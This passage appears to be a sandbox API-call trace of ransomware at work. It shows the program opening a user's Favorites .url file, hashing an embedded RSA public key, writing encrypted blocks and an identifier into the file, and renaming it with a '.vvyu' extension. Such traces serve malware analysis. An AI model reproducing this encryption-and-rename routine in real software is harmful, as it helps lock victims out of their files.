(pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0198.668] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.669] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.669] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.672] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.672] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.674] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.674] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.674] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.674] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.674] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.674] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.675] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.676] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.676] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.676] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.676] GetLastError () returned 0x0 [0198.676] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.676] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.676] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.676] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.676] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.677] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ac8 [0198.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b10 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.678] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0198.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0198.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3068 [0198.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0198.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0198.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0198.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0198.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.682] GetCurrentThreadId () returned 0x66c [0198.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5ec0 [0198.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.683] GetCurrentThreadId () returned 0x66c [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0198.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3068 [0198.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0198.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0198.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0198.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94b10 | out: hHeap=0x620000) returned 1 [0198.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.696] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.696] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.696] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.698] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.698] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.698] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.698] CloseHandle (hObject=0x568) returned 1 [0198.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0198.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.700] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url.vvyu")) returned 1 [0198.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 